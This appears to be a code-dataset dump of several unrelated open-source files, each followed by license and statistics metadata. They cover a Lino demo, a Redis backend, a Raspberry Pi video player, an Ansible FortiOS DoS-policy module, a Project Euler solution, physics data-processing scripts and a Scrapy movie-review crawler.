simple Lino demo application. Note that this application is for demonstration purposes only. """ def setupMenu(self): m = self.addMenu("my","&My Pizzeria") self.addReportItem( m,"services",ServicesReport,label="&Services") pizzeria.PizzeriaMain.setupMenu(self) class MyPizzeria(pizzeria.Pizzeria): name="My Pizzeria" mainFormClass=MyPizzeriaMain def populate(dbc): pizzeria.populate(dbc) SERV = dbc.query(Service) CUST = dbc.query(pizzeria.Customer) ORDERS = dbc.query(pizzeria.Order) PROD = dbc.query(pizzeria.Product) s1 = SERV.appendRow(name="bring home",price=1) s2 = SERV.appendRow(name="organize party",price=100) c3 = CUST.appendRow(name="Bernard") o1 = ORDERS.appendRow(customer=c3,date=itod(20040318)) q = o1.lines() q.appendRow(product=PROD.peek(1),qty=1) q.appendRow(product=s1,qty=1) o2 = ORDERS.appendRow(customer=CUST.peek(1),date=itod(20040319)) q = o2.lines() q.appendRow(product=PROD.peek(1),qty=2) q.appendRow(product=PROD.peek(2),qty=3) o1.register() o2.register()
gpl-3.0
4,601,415,181,698,994,000
27.536842
80
0.694947
false
3.242823
false
false
false
cwoebker/relo
relo/core/backend/redisdb.py
1
1633
#!/usr/bin/env python # encoding: utf-8 import sys import os import redis from relo.core.log import logger dirname = os.path.dirname(os.path.abspath(__file__)) up_dir = os.path.dirname(dirname) sys.path.append(up_dir) from relo.core.interfaces import Backend class REDISDB(Backend): name = "redis" expiretime = 60*60*24*7 # for a week def init(self): logger.debug("Connecting to Redis") self.connection = redis.StrictRedis(host='localhost', port=6379, db=12) def check(self): logger.debug("check not needed with redis") def load(self): logger.debug("Redis auto loads") def save(self): self.connection.save() def addProject(self, key, project, type): project_string = project + ":::" + type self.connection.sadd(key, project_string) def listProjects(self, key): members = self.connection.smembers(key) returnList = [] for member in members: returnList.append(member.split(":::")) return returnList def addMeta(self, path, modified, hash, size, type): pipe = self.connection.pipeline() pipe.hmset(path, dict(modified=modified, hash=hash, size=size, type=type)).expire(path, self.expiretime).execute() del pipe def addSet(self, key, value): self.connection.sadd(key, value) def getSet(self, key): return self.connection.smembers(key) def get(self, key, field): return self.connection.hget(key, field) def find(self, key): return self.connection.keys(pattern='*'+key+'*') def end(self): self.connection.shutdown()
bsd-3-clause
-2,834,990,471,099,505,700
32.346939
122
0.644213
false
3.589011
false
false
false
KanoComputing/kano-video
kano_video/logic/player.py
1
4469
# player.py # # Copyright (C) 2014-2016 Kano Computing Ltd. # License: http://www.gnu.org/licenses/gpl-2.0.txt GNU GPL v2 # # Manages playing of videos import sys import os from kano.utils import is_installed, run_bg, get_volume, percent_to_millibel from kano.logging import logger from .youtube import get_video_file_url # Support for Gtk versions 3 and 2 try: from gi.repository import GObject except ImportError: import gobject as GObject import playudev subtitles_dir = '/usr/share/kano-media/videos/subtitles' omxplayer_present = is_installed('omxplayer') vlc_present = is_installed('vlc') if not omxplayer_present and not vlc_present: sys.exit('Neither vlc nor omxplayer is installed!') def play_video(_button=None, video_url=None, localfile=None, subtitles=None, init_threads=True, keyboard_engulfer=True): """ Plays a local or remote video using the optimal video player found. Handles sound settings and subtitles. """ if video_url: logger.info('Getting video url: {}'.format(video_url)) success, data = get_video_file_url(video_url) if not success: logger.error('Error with getting YouTube url: {}'.format(data)) if _button: _button.set_sensitive(True) return link = data elif localfile: link = localfile else: if _button: _button.set_sensitive(True) return logger.info('Launching player...') if omxplayer_present: volume_percent = get_volume() volume_str = '--vol {}'.format( percent_to_millibel(volume_percent, raspberry_mod=True)) if not subtitles or not os.path.isfile(subtitles): subtitles = None if localfile: filename = os.path.basename(localfile) filename = os.path.splitext(filename)[0] fullpath = os.path.join(subtitles_dir, filename + '.srt') if os.path.exists(fullpath): subtitles = fullpath if not subtitles: subtitles = os.path.join(subtitles_dir, 'controls.srt') subtitles_str = '' try: from kano_settings.system.display import is_overscan if not is_overscan(): subtitles_str = '--subtitle "{subtitles}" ' \ '--font "/usr/share/fonts/kano/bariol/Bariol_Regular.otf" --font-size 35 ' \ '--align center'.format(subtitles=subtitles) except Exception: pass # Set the audio output between HDMI or Jack. Default is HDMI since it's the # safest route given the PiHat lib getting destabilised if Jack is used. audio_out = 'hdmi' try: from kano_settings.system.audio import is_HDMI if not is_HDMI(): audio_out = 'local' except Exception: pass player_cmd = 'omxplayer -o {audio_out} {volume_str} {subtitles} -b "{link}"' \ ''.format( audio_out=audio_out, link=link, volume_str=volume_str, subtitles=subtitles_str ) else: player_cmd = 'vlc -f --no-video-title-show ' \ '"{link}"'.format(link=link) # Play with keyboard interaction coming from udev directly # so that we do not lose focus and capture all key presses playudev.run_player(player_cmd, init_threads=init_threads, keyboard_engulfer=keyboard_engulfer) # finally, enable the button back again if _button: _button.set_sensitive(True) def get_centred_coords(width, height): """ Calculates the top-left and bottom-right coordinates for a given window size to be centred """ from gi.repository import Gdk taskbar_height = 44 monitor = { 'width': Gdk.Screen.width(), 'height': Gdk.Screen.height(), } x1 = (monitor['width'] - width) / 2 x2 = x1 + width y1 = ((monitor['height'] - taskbar_height) - height) / 2 y2 = y1 + height return x1, y1, x2, y2 def stop_videos(_button=None): """ Kills all videos that are currently playing # TODO: Stop only videos which are managed by this module """ if omxplayer_present: run_bg('killall omxplayer.bin') else: run_bg('killall vlc')
gpl-2.0
4,278,216,597,469,036,500
28.596026
96
0.590065
false
3.872617
false
false
false
amenonsen/ansible
lib/ansible/modules/network/fortios/fortios_firewall_DoS_policy6.py
1
16272
#!/usr/bin/python from __future__ import (absolute_import, division, print_function) # Copyright 2019 Fortinet, Inc. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. __metaclass__ = type ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'metadata_version': '1.1'} DOCUMENTATION = ''' --- module: fortios_firewall_DoS_policy6 short_description: Configure IPv6 DoS policies in Fortinet's FortiOS and FortiGate. description: - This module is able to configure a FortiGate or FortiOS device by allowing the user to set and modify firewall feature and DoS_policy6 category. Examples include all parameters and values need to be adjusted to datasources before usage. Tested with FOS v6.0.5 version_added: "2.8" author: - Miguel Angel Munoz (@mamunozgonzalez) - Nicolas Thomas (@thomnico) notes: - Requires fortiosapi library developed by Fortinet - Run as a local_action in your playbook requirements: - fortiosapi>=0.9.8 options: host: description: - FortiOS or FortiGate IP address. type: str required: false username: description: - FortiOS or FortiGate username. type: str required: false password: description: - FortiOS or FortiGate password. type: str default: "" vdom: description: - Virtual domain, among those defined previously. A vdom is a virtual instance of the FortiGate that can be configured and used as a different unit. type: str default: root https: description: - Indicates if the requests towards FortiGate must use HTTPS protocol. type: bool default: true ssl_verify: description: - Ensures FortiGate certificate must be verified by a proper CA. type: bool default: true version_added: 2.9 state: description: - Indicates whether to create or remove the object. type: str choices: - present - absent version_added: 2.9 firewall_DoS_policy6: description: - Configure IPv6 DoS policies. default: null type: dict suboptions: anomaly: description: - Anomaly name. type: list suboptions: action: description: - Action taken when the threshold is reached. type: str choices: - pass - block log: description: - Enable/disable anomaly logging. type: str choices: - enable - disable name: description: - Anomaly name. required: true type: str quarantine: description: - Quarantine method. type: str choices: - none - attacker quarantine_expiry: description: - Duration of quarantine. (Format ###d##h##m, minimum 1m, maximum 364d23h59m, default = 5m). Requires quarantine set to attacker. type: str quarantine_log: description: - Enable/disable quarantine logging. type: str choices: - disable - enable status: description: - Enable/disable this anomaly. type: str choices: - disable - enable threshold: description: - Anomaly threshold. Number of detected instances per minute that triggers the anomaly action. type: int threshold(default): description: - Number of detected instances per minute which triggers action (1 - 2147483647, default = 1000). Note that each anomaly has a different threshold value assigned to it. type: int comments: description: - Comment. type: str dstaddr: description: - Destination address name from available addresses. type: list suboptions: name: description: - Address name. Source firewall.address6.name firewall.addrgrp6.name. required: true type: str interface: description: - Incoming interface name from available interfaces. Source system.zone.name system.interface.name. type: str policyid: description: - Policy ID. required: true type: int service: description: - Service object from available options. type: list suboptions: name: description: - Service name. Source firewall.service.custom.name firewall.service.group.name. required: true type: str srcaddr: description: - Source address name from available addresses. type: list suboptions: name: description: - Service name. Source firewall.address6.name firewall.addrgrp6.name. required: true type: str status: description: - Enable/disable this policy. type: str choices: - enable - disable ''' EXAMPLES = ''' - hosts: localhost vars: host: "192.168.122.40" username: "admin" password: "" vdom: "root" ssl_verify: "False" tasks: - name: Configure IPv6 DoS policies. fortios_firewall_DoS_policy6: host: "{{ host }}" username: "{{ username }}" password: "{{ password }}" vdom: "{{ vdom }}" https: "False" state: "present" firewall_DoS_policy6: anomaly: - action: "pass" log: "enable" name: "default_name_6" quarantine: "none" quarantine_expiry: "<your_own_value>" quarantine_log: "disable" status: "disable" threshold: "11" threshold(default): "12" comments: "<your_own_value>" dstaddr: - name: "default_name_15 (source firewall.address6.name firewall.addrgrp6.name)" interface: "<your_own_value> (source system.zone.name system.interface.name)" policyid: "17" service: - name: "default_name_19 (source firewall.service.custom.name firewall.service.group.name)" srcaddr: - name: "default_name_21 (source firewall.address6.name firewall.addrgrp6.name)" status: "enable" ''' RETURN = ''' build: description: Build number of the fortigate image returned: always type: str sample: '1547' http_method: description: Last method used to provision the content into FortiGate returned: always type: str sample: 'PUT' http_status: description: Last result given by FortiGate on last operation applied returned: always type: str sample: "200" mkey: description: Master key (id) used in the last call to FortiGate returned: success type: str sample: "id" name: description: Name of the table used to fulfill the request returned: always type: str sample: "urlfilter" path: description: Path of the table used to fulfill the request returned: always type: str sample: "webfilter" revision: description: Internal revision number returned: always type: str sample: "17.0.2.10658" serial: description: Serial number of the unit returned: always type: str sample: "FGVMEVYYQT3AB5352" status: description: Indication of the operation's result returned: always type: str sample: "success" vdom: description: Virtual domain used returned: always type: str sample: "root" version: description: Version of the FortiGate returned: always type: str sample: "v5.6.3" ''' from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.connection import Connection from ansible.module_utils.network.fortios.fortios import FortiOSHandler from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG def login(data, fos): host = data['host'] username = data['username'] password = data['password'] ssl_verify = data['ssl_verify'] fos.debug('on') if 'https' in data and not data['https']: fos.https('off') else: fos.https('on') fos.login(host, username, password, verify=ssl_verify) def filter_firewall_DoS_policy6_data(json): option_list = ['anomaly', 'comments', 'dstaddr', 'interface', 'policyid', 'service', 'srcaddr', 'status'] dictionary = {} for attribute in option_list: if attribute in json and json[attribute] is not None: dictionary[attribute] = json[attribute] return dictionary def underscore_to_hyphen(data): if isinstance(data, list): for elem in data: elem = underscore_to_hyphen(elem) elif isinstance(data, dict): new_data = {} for k, v in data.items(): new_data[k.replace('_', '-')] = underscore_to_hyphen(v) data = new_data return data def firewall_DoS_policy6(data, fos): vdom = data['vdom'] state = data['state'] firewall_DoS_policy6_data = data['firewall_DoS_policy6'] filtered_data = underscore_to_hyphen(filter_firewall_DoS_policy6_data(firewall_DoS_policy6_data)) if state == "present": return fos.set('firewall', 'DoS-policy6', data=filtered_data, vdom=vdom) elif state == "absent": return fos.delete('firewall', 'DoS-policy6', mkey=filtered_data['policyid'], vdom=vdom) def is_successful_status(status): return status['status'] == "success" or \ status['http_method'] == "DELETE" and status['http_status'] == 404 def fortios_firewall(data, fos): if data['firewall_DoS_policy6']: resp = firewall_DoS_policy6(data, fos) return not is_successful_status(resp), \ resp['status'] == "success", \ resp def main(): fields = { "host": {"required": False, "type": "str"}, "username": {"required": False, "type": "str"}, "password": {"required": False, "type": "str", "no_log": True}, "vdom": {"required": False, "type": "str", "default": "root"}, "https": {"required": False, "type": "bool", "default": True}, "ssl_verify": {"required": False, "type": "bool", "default": True}, "state": {"required": True, "type": "str", "choices": ["present", "absent"]}, "firewall_DoS_policy6": { "required": False, "type": "dict", "default": None, "options": { "anomaly": {"required": False, "type": "list", "options": { "action": {"required": False, "type": "str", "choices": ["pass", "block"]}, "log": {"required": False, "type": "str", "choices": ["enable", "disable"]}, "name": {"required": True, "type": "str"}, "quarantine": {"required": False, "type": "str", "choices": ["none", "attacker"]}, "quarantine_expiry": {"required": False, "type": "str"}, "quarantine_log": {"required": False, "type": "str", "choices": ["disable", "enable"]}, "status": {"required": False, "type": "str", "choices": ["disable", "enable"]}, "threshold": {"required": False, "type": "int"}, "threshold(default)": {"required": False, "type": "int"} }}, "comments": {"required": False, "type": "str"}, "dstaddr": {"required": False, "type": "list", "options": { "name": {"required": True, "type": "str"} }}, "interface": {"required": False, "type": "str"}, "policyid": {"required": True, "type": "int"}, "service": {"required": False, "type": "list", "options": { "name": {"required": True, "type": "str"} }}, "srcaddr": {"required": False, "type": "list", "options": { "name": {"required": True, "type": "str"} }}, "status": {"required": False, "type": "str", "choices": ["enable", "disable"]} } } } module = AnsibleModule(argument_spec=fields, supports_check_mode=False) legacy_mode = 'host' in module.params and module.params['host'] is not None and \ 'username' in module.params and module.params['username'] is not None and \ 'password' in module.params and module.params['password'] is not None if not legacy_mode: if module._socket_path: connection = Connection(module._socket_path) fos = FortiOSHandler(connection) is_error, has_changed, result = fortios_firewall(module.params, fos) else: module.fail_json(**FAIL_SOCKET_MSG) else: try: from fortiosapi import FortiOSAPI except ImportError: module.fail_json(msg="fortiosapi module is required") fos = FortiOSAPI() login(module.params, fos) is_error, has_changed, result = fortios_firewall(module.params, fos) fos.logout() if not is_error: module.exit_json(changed=has_changed, meta=result) else: module.fail_json(msg="Error in repo", meta=result) if __name__ == '__main__': main()
gpl-3.0
4,463,918,872,802,416,600
33.621277
157
0.505101
false
4.785882
false
false
false
fbcom/project-euler
072_counting_fractions.py
1
1188
#!/usr/bin/env python # -*- coding: utf-8 -*- # # A Solution to "Counting fractions" – Project Euler Problem No. 72 # by Florian Buetow # # Sourcecode: https://github.com/fbcom/project-euler # Problem statement: https://projecteuler.net/problem=72 def get_distinct_prime_factors(n): ret = [] if n > 1: for d in [2] + range(3, 1+int(n**0.5), 2): if n % d == 0: ret.append(d) while n % d == 0: n = n / d if n <= 1: break if n > 1: ret.append(n) return ret def phi(n): # Euler's totient function: # phi(n) := counts how many numbers k < n have gcd(n,k) = 1 ret = n for p in get_distinct_prime_factors(n): ret = ret - ret / p return ret def count_reduced_proper_fractions(limit): # turns out the solution is equal to the sum of phi(i) for i in [2,...,limit] ret = 0 for n in range(2, limit+1): ret += phi(n) return ret # Testcase assert count_reduced_proper_fractions(8) == 21, "Testcase failed" # Solve limit = 1000*1000 # one million solution = count_reduced_proper_fractions(limit) print "Solution:", solution
mit
-8,231,899,438,116,633,000
23.708333
81
0.572513
false
3.112861
false
false
false
aolindahl/epicea
straighten_lines.py
1
4479
# -*- coding: utf-8 -*- """ Created on Wed Jul 29 15:34:36 2015 @author: antlin """ import numpy as np import matplotlib.pyplot as plt import lmfit import epicea import electron_calibration_data import plt_func line_model = epicea.electron_calibration_helper.n_line_fit_model line = 'voigt' data_list = electron_calibration_data.get_data_in_list('357', True) r_axis_mm = np.linspace(0, 25, 2**9+1)[1::2] th_axis_rad = np.linspace(0, 2*np.pi, 2**9+1)[1::2] th_limits = epicea.limits_from_centers(th_axis_rad) # data = data_list[0] for data in data_list: r_th_img = data.get_e_rth_image(r_axis_mm, th_axis_rad)[0] r_proj = r_th_img.sum(axis=0) proj_params_initial = epicea.electron_calibration_helper.start_params( r_axis_mm, r_proj, n_lines=2) proj_result = lmfit.minimize(line_model, proj_params_initial, args=(r_axis_mm, r_proj), kws={'line_type': line}) r_th_fig = plt_func.figure_wrapper('theta - r ' + data.name()) ax_origaninl = plt.subplot(221) plt_func.imshow_wrapper(r_th_img, r_axis_mm, th_axis_rad, kw_args={'aspect': 'auto'}) plt_func.colorbar_wrapper() ax_origaninl.autoscale(False) plt.subplot(223) plt.plot(r_axis_mm, r_proj) plt.plot(r_axis_mm, line_model(proj_result.params, r_axis_mm, line_type=line), '--') centers = (r_th_img * r_axis_mm).sum(axis=1) / r_th_img.sum(axis=1) # radial_factors = centers.mean()/centers # Find the center of the first line low_radius_centers = np.empty_like(centers) for i_th in range(len(th_axis_rad)): y = r_th_img[i_th, :] i_min = r_axis_mm.searchsorted(centers[i_th]) while y[i_min] > y[i_min - 1]: i_min -= 1 while y[i_min] > y[i_min+1]: i_min += 1 I_low_radius = (((centers[i_th] - 3) <= r_axis_mm) & (r_axis_mm <= centers[i_th])) low_radius_centers[i_th] = ((r_th_img[i_th, I_low_radius] * r_axis_mm[I_low_radius]).sum() / r_th_img[i_th, I_low_radius].sum()) radial_factors = low_radius_centers.mean() / low_radius_centers ax_origaninl.plot(centers, th_axis_rad, 'm') ax_origaninl.plot(low_radius_centers, th_axis_rad, 'c') plt_func.figure_wrapper('centers ' + data.name()) plt.subplot(121) plt.plot(centers, th_axis_rad, label='full center') plt.plot(low_radius_centers, th_axis_rad, label='first center') plt.title('center position') plt_func.legend_wrapper() plt.subplot(122) plt.plot(radial_factors, th_axis_rad) plt.title('r factors') r = data.electrons.pos_r.value th = data.electrons.pos_t.value for i in range(len(th_axis_rad)): selection = (th_limits[i] < th) & (th < th_limits[i+1]) r[selection] *= radial_factors[i] r_th_img_corrected = epicea.center_histogram_2d(r, th, r_axis_mm, th_axis_rad) r_proj_corrected = r_th_img_corrected.sum(axis=0) proj_corrected_params_initial = \ epicea.electron_calibration_helper.start_params( r_axis_mm, r_proj_corrected, n_lines=2) proj_corrected_result = lmfit.minimize(line_model, proj_corrected_params_initial, args=(r_axis_mm, r_proj_corrected), kws={'line_type': line}) ax = r_th_fig.add_subplot(222) plt.sca(ax) plt_func.imshow_wrapper(r_th_img_corrected, r_axis_mm, th_axis_rad, kw_args={'aspect': 'auto'}) axis = plt.axis() plt.plot(centers * radial_factors * np.ones_like(th_axis_rad), th_axis_rad, 'm') plt.plot(low_radius_centers.mean() * np.ones_like(th_axis_rad), th_axis_rad, 'm') plt_func.colorbar_wrapper() plt.sca(r_th_fig.add_subplot(224)) plt.plot(r_axis_mm, r_proj_corrected) plt.plot(r_axis_mm, line_model(proj_corrected_result.params, r_axis_mm, line_type=line), '--') plt_func.figure_wrapper('waterfall ' + data.name()) for i in range(len(th_axis_rad)): plt.plot(r_axis_mm, r_th_img[i, :] + i * 20) r_th_fig.tight_layout()
gpl-2.0
8,085,153,324,896,847,000
35.120968
78
0.553472
false
3.03661
false
false
false
siberianisaev/NeutronBarrel
Neutrons preprocessing/neutron_preprocessing.py
1
5365
import pandas as pd import numpy as np class ExpProcessing: """ class for preprocessed neutrons experiment data """ def __init__(self, counts_measured): """ Input : counts_measured - list (or any numpy convertible type) Method creates a data frame with experimental counts, its errors, normed values and its errors, mean and variance of the spectra The data frame consists the next columns: ["bin", "count", "count_error", "probability", "probability_error", "relative_error", "mean", "mean_error", "variance"] """ self._data = pd.DataFrame(columns=["bin", "count", "count_error", "probability", "probability_error", "relative_error", "mean", "mean_error", "variance"]) if not isinstance(counts_measured, np.ndarray): try: counts_measured = np.array(counts_measured) except TypeError: raise TypeError("count_measured must be an array or any numpy convertible type") if counts_measured.size < 10: counts_measured = np.pad(counts_measured, (0, 10 - counts_measured.size)) self._data["bin"] = [i for i in range(counts_measured.size)] self._data["count"] = counts_measured self._data["count_error"] = self.count_error_calculation() self._data["relative_error"] = self._data["count_error"] / self._data["count"] self._data["probability"], self._data["probability_error"] = self.normalization() self._data["mean"] = self.mean_calculation() self._data["mean_error"] = self.calculate_error_of_mean() self._data["variance"] = self.variance_calculation() def count_error_calculation(self): """ Method returns errors of experimental points s s = sqrt(N) / sqrt(k), for k >= 1 s = sqrt(N) for k = 0 where N - counts of events with multiplicity k, k - multiplicity of event :return: array of absolute errors """ counts, bins = self._data["count"], self._data["bin"] return [(N / k) ** 0.5 if k > 1 else N ** 0.5 for N, k in zip(counts, bins)] def normalization(self): """ Method converts experimental points and errors to probability of neutron emission and its errors :return: two arrays: array of neutron emissions probability and its errors """ counts = self._data["count"] count_errors = self._data["count_error"] total = counts.sum() return counts / total, count_errors / total def mean_calculation(self): """ Method calculates mean value of experimental spectra mean = total_neutrons / total_events :return: mean value """ bins = self._data["bin"] counts = self._data["count"] return bins.dot(counts).sum() / counts.sum() def variance_calculation(self): """ Method calculates variance of experimental spectra variance = mean()**2 - mean(data**2) :return: variance """ bins, counts = self._data["bin"], self._data["count"] mx2 = (bins*bins).dot(counts).sum() / counts.sum() m = self._data["mean"][0] return mx2 - m * m def get_data(self): """ Method returns the data in pandas.DataFrame format :return: pandas.DataFrame object """ return self._data def to_csv(self, filename=""): """ Method saves all calculated data to .csv file with name 'filename' :param filename: otional, name of file, default is 'neutrons+{current_date_and_time}.csv' """ if filename == "": from datetime import datetime now = datetime.now().strftime("%Y_%m_%d_%H_%M") filename = f"neutrons_{now}.csv" try: self._data.to_csv(filename, index=False, header=True) print(filename + " was saved successfully") except FileNotFoundError as ex: print("########\n# No such directory! Unsuccessful writing!\n########") def calculate_error_of_mean(self): """ Method calculates the statistical error of measured mean value. dM^2= (dN / E)^2 + (N * dE / E^2)^2 dM - mean error N, dN - number of neutrons and its error (dN = sqrt(N)) E, dE - number of events and its error (dE = sqrt(E)) :return: dM, error of measured mean value """ total_events = self._data["count"].sum() total_neutrons = self._data["count"].dot(self._data["bin"]).sum() delta_events = total_events ** 0.5 delta_neutrons = total_neutrons ** 0.5 delta_mean_sq = (delta_neutrons / total_events)**2 + \ (total_neutrons * delta_events / total_events**2)**2 return delta_mean_sq ** 0.5 if __name__ == "__main__": folder = "csv_05_2021/" file = "Fm244" + ".csv" a = [10, 20, 30] pd.set_option('display.max_columns', None) b = ExpProcessing(a) print(b.get_data()) print(b.calculate_error_of_mean()) # b.to_csv(folder + file)
mit
-5,235,752,218,111,256,000
38.954198
97
0.555266
false
4.076748
false
false
false
Rafael-Cheng/MovieReviewCrawlers
broad crawler/MovieReview/MovieReview/spiders/MovieReviewSpider.py
1
4028
# -*- encoding:utf-8 -*- import sys import scrapy from MovieReview.items import MoviereviewItem from scrapy_redis.spiders import RedisSpider from scrapy.http import Request, HtmlResponse from scrapy.linkextractors import LinkExtractor from scrapy.selector import Selector from bs4 import BeautifulSoup from obtain_date import obtain_date reload(sys) sys.setdefaultencoding('utf-8') class MovieReviewSpider(scrapy.Spider): name = "movie" start_urls = ['http://maoyan.com/news?showTab=2'] # generate navigation page urls def parse(self, response): num_of_a = 0 leaf_divs = [] div_lenOfa = [] yield scrapy.Request(response.url, callback=self.extractLinks) divs = response.xpath('//div') # find leaf divs for div in divs: if len(div.xpath('.//div').extract()) == 0: leaf_divs.append(div) # calculate the number of a tags in a div for div in leaf_divs: div_lenOfa.append((div, len(div.xpath('.//a')))) # sort by the number of tags nav_divs = sorted(div_lenOfa, key=lambda tup:tup[1], reverse=True) divs = response.xpath('./div').extract() # locate page number tag for div in nav_divs: txt_in_a_tag = div[0].xpath('.//a/text()').extract() if len(txt_in_a_tag) == 0: continue if txt_in_a_tag[-1] == '下一页': url_next_page = div[0].xpath('.//a/@href').extract()[-1] url = response.urljoin(url_next_page) yield scrapy.Request(url, callback=self.parse) def extractLinks(self, response): div_lenDiv = [] comment_urls = [] divs = response.xpath('//div') for div in divs: div_lenDiv.append([div, len(div.xpath('./div'))]) sorted_divs = sorted(div_lenDiv, key=lambda div_lenDiv:div_lenDiv[1], reverse=True) urls = sorted_divs[0][0].xpath('.//a/@href').extract() for url in urls: complete_url = response.urljoin(url) if complete_url not in comment_urls: comment_urls.append(complete_url) for url in comment_urls: yield scrapy.Request(url=url, callback=self.parsePage) # parse specific pages def parsePage(self, response): item = MoviereviewItem() div_lenOfP = [] try: title = '' title = ''.join(response.xpath('//h1/text()').extract_first().split()) except AttributeError as e: if title == None or title == '': return url = str(response.url).replace('http://', '').\ replace('https://', '').replace('www.', '') source = url.split('.')[0] divs = response.xpath('//div') for div in divs: div_lenOfP.append([div, len(div.xpath('./p'))]) sorted_divs = sorted(div_lenOfP, key=lambda div_lenOfP:div_lenOfP[1], reverse=True) content_div = sorted_divs[0][0] content = ''.join(content_div.xpath('.//p/text()').extract()) # imgs = [x for x in content_div.xpath('.//img/@src').extract()] # hashed_images = [hash(x) for x in imgs] item['Url'] = response.url item['Title'] = title item['Source'] = source item['Time'] = obtain_date(response) # item['Images'] = str(hashed_images) item['Content'] = content # item['image_urls'] = imgs yield item def determineMain(div, tag): maxTag = 0 bestDiv = div divs = div.xpath('./div').extract() for _div in divs: retDiv, noOfTag = determineMain(_div, tag) if noOfTag > maxTag: maxTag = noOfTag bestDiv = retDiv search_string = './' + tag noOfDiv = len(div.xpath(search_string).extract()) if maxTag < noOfDiv: maxTag = noOfDiv bestDiv = div return div, maxTag return div
gpl-3.0
8,782,475,459,918,302,000
35.563636
91
0.55644
false
3.724074
false
false
false